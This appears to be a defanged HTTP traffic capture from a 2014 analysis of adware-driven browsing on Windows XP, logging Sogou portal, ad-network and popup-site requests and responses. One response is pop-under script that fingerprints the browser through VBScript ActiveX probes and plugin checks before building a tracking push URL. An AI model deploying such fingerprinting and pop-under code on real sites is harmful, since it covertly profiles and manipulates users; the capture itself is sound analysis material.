b9\u4e03\u5e38\u59d4\u5c0f\u65f6\u5019\u7684\u90a3\u4e9b\u4e8b\u513f",
"picurl":0,"url":"http:\/\/news.sohu.com\/20140601\/n400300510.shtml?p
vid=7d0a16e31613c9e0","color":false},{"title":"\u592e\u89c6\u8d22\u7ec
f\u9891\u9053\u603b\u76d1\u88ab\u68c0\u65b9\u5e26\u8d70","picurl":0,"u
rl":"http:\/\/news.sohu.com\/20140601\/n400298248.shtml?adsid=1?pvid=7
d0a16e31613c9e0","color":false},{"title":"\u62db\u8fdc\u6740\u4eba\u5a
cc\u72af\uff1a\u4fe1\u795e\u4e0d\u6015\u6cd5\u5f8b ","picurl":0,"url":
"http:\/\/news.sohu.com\/20140601\/n400296667.shtml?adsid=1?pvid=7<<< skipped >>>

GET /images/weather/cloudy.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; IPLOC=CA; GOTO=Af22014; SUV=008D2FB7B86B2626538A9F06D057B568


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/gif

Content-Length: 1663

Connection: keep-alive

Last-Modified: Sun, 09 Oct 2011 10:21:03 GMT

ETag: "4e91758f-67f"

Expires: Sat, 14 Jun 2014 02:53:46 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

GIF89a(.(.............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............................y.......................................
......................................................................
......................................................................
......................................................................
...........!.......,....(.(........H......*\......#J.H1..t..bCa..(Q..e
L(..7........H..x]..H..ff\[email protected]..
...ajT.Q..H.#F......Xa.....04. eS...z.*E....E.......?Ql...'.&*.k402...
6l.D...L#(v<.2....g..)Q....W#0..!.G//q.....N.0.....Q........... 2x.
..........y....Z...Yx...#Sh..$....~..8.a..KY...*[email protected]......
..q..r.".X.B.^..I.1...;.es...$....x"..q$QA.)\....X`..P.......J8.....aq
p...L..!..`.1..r.......".....h.N7.}..$...C.Q......P.(<....?....t...
..!.N45.B.*[email protected]...<!$.20P`..Pd.. Y....)..B..
......H............"..#..........D.Z,...E.RD 3... \,..;.T..2V`.H.. .D"
L......A.!R.!B.....C]$..0[...4R.2..D..A!j...0?DAG..84.&.T1..R....6H!..
eD.B..t.......-s81.......?.R./..1F...D..v....O..H#..-uB..3.=Xc....

<<< skipped >>>

GET /v53/get_tj.php?hz=4671920&ids=qiche HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://123.sogou.com/?22014

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; IPLOC=CA; _seCityCode2=CN110100; tjv2_cont=00_01_08_09; GOTO=Af22014; SUV=00E57BA1B86B2626538A9F06DEF6B036


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:31 GMT

Content-Type: text/javascript; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.1.6

eff..{"qiche":[{"tab":"\u6c7d\u8f66","taburl":"http:\/\/123.sogou.com\
/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic2.xcarimg.com\/img\/
news_photo\/2014\/05\/28\/i8g7XZO1lz1162.jpg","url":"http:\/\/topic.xc
ar.com.cn\/201404\/ford562\/?zoneclick=101487","title":"\u798f\u7279\u
7ffc\u864e","price":""},{"picurl":"http:\/\/pic4.xcarimg.com\/img\/new
s_photo\/2014\/05\/29\/mE8bXnNioe2802.jpg","url":"http:\/\/price.xcar.
com.cn\/serise1168\/city9999-1-1.htm?zoneclick=100517","title":"\u54c8
\u5f17H6\u21938\u5343","price":""},{"url":"http:\/\/price.xcar.com.cn\
/serise630\/city9999-1-1.htm?zoneclick=100517","title":"\u79d1\u9c81\u
5179\u4e09\u53a2 \u73b0\u91d1\u4f18\u60e03\u4e07\u5143","color":false}
,{"url":"http:\/\/price.xcar.com.cn\/serise1933\/city9999-1-1.htm?zone
click=100517","title":"\u79d1\u9c81\u5179\u6380\u80cc \u73b0\u4f18\u60
e01.3\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/
serise109\/city9999-1-1.htm?zoneclick=100517","title":"\u5609\u5e74\u5
34e\u4e24\u53a2 \u73b0\u91d1\u4f18\u60e02\u4e07\u5143","color":false},
{"url":"http:\/\/price.xcar.com.cn\/serise937\/city9999-1-1.htm?zonecl
ick=100517","title":"\u96ea\u94c1\u9f99C5 \u73b0\u91d1\u4f18\u60e04.5\
u4e07\u5143","color":false}]},{"tab":"\u65b0\u8f66","taburl":"http:\/\
/123.sogou.com\/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic1.xca
rimg.com\/img\/news_photo\/2014\/05\/29\/KCHDs5Hhfp1883.jpg","url":"ht
tp:\/\/price.xcar.com.cn\/serise561\/city9999-1-1.htm?zoneclick=100518
","title":"\u950b\u8303","price":"\u964d2.6\u4e07"},{"picurl":"htt

<<< skipped >>>

GET /pShow.php?PID=5534 HTTP/1.1

Accept: */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: lg1236.565882.com

Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily

Server: nginx/1.0.0

Date: Sun, 01 Jun 2014 03:34:16 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.2.17

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Cache-Control: no-cache, must-revalidate

location: hXXp://taoqibao.zhouliboguju.com/pShow.php?PID=5534

Set-Cookie: lgPTN43333094029862=0; expires=Sun, 01-Jun-2014 16:00:00 GMT; path=/; domain=.565882.com
2f6c..var popUrl = 'hXXp://lg1236.565882.com/pClick.php?ap=NTUzNHwxMDE
yMDlhNjYzMDVhZmM0MmM5OWRkZGE4MTc0ZmRlZmMwZg==';..var lgUnionPushUrl = 
CrazyInitUrl(popUrl);..function CrazyInitUrl(urls){...var sf=0,sc=0,ol
='',sd=0;...var ae = function(p) {....v = false;....document.write('&l
t;SCRIPT LANGUAGE=VBScript>\n on error resume next \n v = IsObject(
CreateObject("' p '"))<\/SCRIPT>\n');....if(v){.....return '1';.
...}else{.....return '0';....}...};...var af = function(p) {....var m 
= '';....for (var i=0; i < navigator.mimeTypes.length; i  ){.....m 
 = navigator.mimeTypes[i].type.toLowerCase();....}....v = '0';....if (
m.indexOf(p) != -1){.....if (navigator.mimeTypes[p].enabledPlugin != n
ull) v = '1';....}....return v;...};...var __dm  = (navigator.appName.
indexOf("Netscape") != -1);...var __di  = (navigator.userAgent.toLower
Case().indexOf("msie") != -1);...var __dw = ((navigator.userAgent.toLo
werCase().indexOf("win")!=-1) || (navigator.userAgent.toLowerCase().in
dexOf("32bit")!=-1));...if(__dw && __di) sf = ae("ShockwaveFlash.Shock
waveFlash.1");...if(!__dw || __dm) fs = af("application/x-shockwave-fl
ash");...if(navigator.appName=="Netscape"){....ol = navigator.language
.substr(0,2);...}else{....ol = navigator.userLanguage.substr(0,2);...}
...try{....var us = window.screen.width '_' window.screen.height;...}c
atch(e){....var us = 0;...}...if(navigator.cookieEnabled) sc = 1;...if
(document.getElementById) sd = 1;...var t = new Date();...var pushTime
 = parseInt(t.getTime()/1000);...urls ='&pt=1&ft=' pushTime '&af='<<< skipped >>>

GET /dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1401576015383 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: wan.sogou.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: text/plain; charset=utf-8

Content-Length: 374

Connection: keep-alive

Set-Cookie: SSUID=26266BB84BB5562F949C6FE1D8FAA2FD; expires=Sat, 27-May-34 03:33:25 GMT; path=/

Set-Cookie: IPLOC=CA; path=/

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
__yx2q([{"gid":"123","title":"............","source":"0011000100006"},
{"gid":"212","title":"............","source":"0011000100007"},{"gid":"
181","title":".........","source":"0011000100008"},{"gid":"86","title"
:"............OL","source":"0011000100009"},{"gid":"178","title":"....
..","source":"0011000100010"},{"gid":"215","title":"Sogou......2","sou
rce":"0011000100011"}])...

GET /code/flash/lq2/300250/0.gif HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.70e.com

Connection: Keep-Alive

Cookie: Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 200 OK

Content-Type: image/gif

Last-Modified: Fri, 16 May 2014 08:13:43 GMT

Accept-Ranges: bytes

ETag: "f284f7c0de70cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:25 GMT

Content-Length: 74161
GIF89a,.............KT.....hq...i7....u].....KoI2......jTK...ofU.....p
...K2-.WJ.y.Qip.....!.xk......NF1Rs....w.y..... k.....L6C.......e4....
.. ..........RJXi..............x...iy.m5,...26F...xxx.&-..x.eW.....g.u
6......CDD.....x......965....eVxugVVW........v.yz.wg.....v....X2..C,#.
...ggd...uif....U7.xh.....y.......wW5C4..w.jd..h.......wCiXa.tE.eE....
...........dvw......J&..hF.wv...........F%$#...5&$..w.xS.iC.E&...Rk...
....WGC.T'....V5...FGSDVY....WH..fVUD..y......Ud\.......iW.......uW.4B
k,.#.....44%.s7...WHU..i.........vju.vY3(3guhE...S'........h....$m...)
b...j.tH..y.F;.hfB.".......hE.1....fhw$'6..........D'!48...HSF^......d
/....j7.....|uB..........'1%.hZ}..z....X.G3....W^.Rg....B...c..D.<V
.hyo^;s..r.(.tI....iqC\...@......*..)[email protected]@.{>...~.m.t).3|.
[email protected]......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="
..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:n
s:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:
27        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rd
f-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http:/
/ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sT
ype/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:Origi
nalDocumentID="xmp.did:30A0B0B5F5DBE311AB36C900C3E8600A" xmpMM:Documen
tID="xmp.did:D3A67F04DC0811E3A2F28199282E64EE" xmpMM:InstanceID="xmp.i
id:D3A67F03DC0811E3A2F28199282E64EE" xmp:CreatorTool="Adobe Photoshop 
CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid<<< skipped >>>

GET /web/images/texture.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:09 GMT

Content-Type: image/gif

Content-Length: 11841

Connection: keep-alive

Last-Modified: Thu, 17 Apr 2014 15:36:33 GMT

Accept-Ranges: bytes

ETag: "80965fcf525acf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
GIF89a..^.............................................................
......................................................................
.................................................................!....
...,......^......pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~...
......................................................................
...............................................................H......
*\......#J.H.....3j...... C..I....(S.\[email protected]...
.H.*].....P.J.J....X.j......`...K....h..].....p...K....x............L.
..... ^......#K.L.....3k.......C..M.....S.^......c..M.....s...........
N...... _.......K..`.\..p@......!....}{..E..h......q.(..=..! h........
G.}5...~.$.C}X`7.........H.J....v.*X..........7!y>...y.^.R..v(...a.
.{. ..~...@.>....-.h...q.d.4....B6......$.V^9...e....e.#..]..xE2.d.
Y.....p..._v..|...$.V.G^.V....nf).BH*...E.Gc..Nq#yqn.^...0A...z(A."hg.
#"....Jq..`....@...@H..$.L..d.K.H^.c.H....jO...)&.I.......B.!......h..
.M..x.>.evi.`......m;.....TD ..K....^....8L0............g..D.8R....
l*.;.......'.{[email protected]<........Z._.K.{/.-.h.....n...l..V...{...o...`
[email protected]./|. ....581.Iv....D.A.,.._.P
..A......M.... .x>....vj-...|.t..6K(....1.k.....tN.1z.........Y....
..n.:..T...z.>L..~....".....O....A..Z.}..=T_........3.... /...\. |.
.?.../......p......-.P.....}2..S....F}.}........d`=.K..%x.".M~.._.&...
....[..|A&.T.|.L.......O.([email protected]"...<..
.F=....H.*....3...h=....!.A...5'[email protected]....<<< skipped >>>

GET /miniindex/ HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 10093

Content-Type: text/html

Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html

Last-Modified: Thu, 22 May 2014 11:22:12 GMT

Accept-Ranges: bytes

ETag: "684ac813b075cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:35 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.jgtj.com.cn/
ll","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://VVV.j
gtj.com.cn/ll","0","nvxing_509_366.htm","0"]);..bq_array.push(["....",
"102","hXXp://VVV.jgtj.com.cn/ll","0","lieqi_509_366.htm","0"]);..bq_a
rray.push(["....","100","hXXp://VVV.jgtj.com.cn/ll","0","shehui_509_36
6.htm","0"]);..bq_array.push(["....","120","hXXp://VVV.jgtj.com.cn/ll"
,"0","jiankang_509_366.htm","0"]);..bq_array.push(["....","130","http:
//VVV.jgtj.com.cn/ll","0","meinv.htm","0"]);..bq_array.push(["....<<< skipped >>>

GET /miniindex/inc/jquery-1.7.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 91342

Content-Type: application/x-javascript

Last-Modified: Thu, 10 Apr 2014 16:44:10 GMT

Accept-Ranges: bytes

ETag: "069a418dc54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:37 GMT
/*!. * jQuery JavaScript Library v1.6.1. * hXXp://jquery.com/. *. * Co
pyright 2011, John Resig. * Dual licensed under the MIT or GPL Version
 2 licenses.. * hXXp://jquery.org/license. *. * Includes Sizzle.js. * 
hXXp://sizzlejs.com/. * Copyright 2011, The Dojo Foundation. * Release
d under the MIT, BSD, and GPL Licenses.. *. * Date: Thu May 12 15:04:3
6 2011 -0400. */.(function(a,b){function cy(a){return f.isWindow(a)?a:
a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[
a]){var b=f("<" a ">").appendTo("body"),d=b.css("display");b.rem
ove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.fram
eBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.creat
eElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("
<!doctype><html><body></body></html>");b
=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.bod
y.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.eac
h(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}fu
nction ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}func
tion ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b)
{}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function c
b(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,
e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g  ){if(g===1)fo
r(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converte
rs[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k<<< skipped >>>

GET /miniindex/nvxing_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 12745

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:01 GMT

Accept-Ranges: bytes

ETag: "80544bd2d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/lieqi_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 13149

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:34 GMT

Accept-Ranges: bytes

ETag: "0bbf6e5d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/meinv.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 6471

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:42 GMT

Accept-Ranges: bytes

ETag: "06fbbead057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:40 GMT
<!DOCTYPE html PUBliC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta content
="IE=10.000" http-equiv="X-Ua-Compatible"> ..<meta http-equiv="C
ontent-Type" content="text/html; charset=gb2312">.. ..<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">..&
lt;title>......</title>..<base target=_blank>..<link
 href="inc/style.css" rel="stylesheet" type="text/css">..<style 
type="text/css">...bj {background-color: #FFFFFF;float: left;height
: 336px;width: 509px;}...bj .top {float: left;height: 207px;margin-bot
tom: 3px;width: 509px;}...bj .top .top_left {float: left;height: 206px
;margin-right: 4px;width: 274px;}...txt1{ background: #000;line-height
: 30px;height: 30px;overflow: hidden;text-align: center;display: block
;color: #fff;margin: -29px 0 0 0;width: 231px;position: relative;opaci
ty: 0.7;filter: alpha(opacity=60);cursor: pointer;float: left;font-siz
e: 14px;}...bj .top .top_right {float: right;height: 207px;width: 231p
x;}...bj .top .top_right .right_01 {height: 95px;margin-bottom: 4px;}.
..txt2{ background: #000;line-height: 22px;height: 22px;overflow: hidd
en;text-align: center;display: block;color: #fff;margin: -21px 0 0 0;w
idth: 231px;position: relative;opacity: 0.7;filter: alpha(opacity=60);
cursor: pointer;float: left;font-size: 12px;}...bj .up {float: left;he
ight: 126px;width: 509px;}..ul {margin: 0;padding: 0;}...bj .up li<<< skipped >>>

GET /miniindex/nvxing_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive

GET /miniindex/nvxing_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive

GET /miniindex/nvxing_509_366.htm?time=undefined HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET 
HTTP/1.1 200 OK

Content-Length: 12745

Content-Type: text/html

Last-Modified: Mon, 14 Apr 2014 11:01:01 GMT

Accept-Ranges: bytes

ETag: "80544bd2d057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv=
"Content-Type" content="text/html; charset=GBK">..<title>mini
_509_366</title>..<base href="." target="_blank" />..    .
.<style type="text/css">../*....*/..html,..body{ overflow:hidden
; }..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,form,input,textarea,
p,th,td,button { padding:0; margin:0;}..input,label,select,option,text
area,button { font:12px/18px Simsun, Helvetica, Arial, sans-serif; }..
table { border-collapse:collapse; border-spacing:0; }..ul { list-style
:none; }..img { border:none; }..button { cursor:pointer; }..input,text
area { font-size:12px; }..body { font:12px/18px Simsun, Helvetica, Ari
al, sans-serif; text-align:center;}..a { text-decoration:none; color:#
333333; }..a:hover { text-decoration:underline; color:#BD0A01; }..::se
lection {background-color:#669800;color:#FFFFFF;}..::-moz-selection {b
ackground-color:#669800;color:#FFFFFF;}...list_pic li.noMargin{margin:
0}../*global*/...more,...home,...at_me { display:inline-block; }...wb_
ico { background-position:right 3px; padding-right:10px; }...more_box{
